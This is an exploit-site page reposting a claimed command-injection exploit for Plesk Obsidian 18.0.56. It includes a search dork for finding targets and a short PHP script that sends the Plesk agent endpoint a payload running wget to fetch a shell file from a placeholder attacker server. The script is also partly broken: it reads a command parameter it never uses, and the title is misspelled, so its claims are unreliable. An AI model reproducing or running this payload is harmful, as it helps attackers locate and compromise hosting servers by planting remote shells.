Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023110010

Below is a copy:

Plesk Obsidian 18.0.56 command injecrion
##Title :Plesk Obsidian 18.0.56
## Author : Hamza Anonime
## Date: 2023/11/12



Dork : intitle:"Plesk Obsidian 18.0.56"


Exploit:
<?php
$target = 'http://target.com:8443/enterprise/control/agent.php';
$cmd = $_GET['cmd'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '0=wget+http://yourserver.com/shell.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
$exec = curl_exec($ch);
curl_close($ch);
?>

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.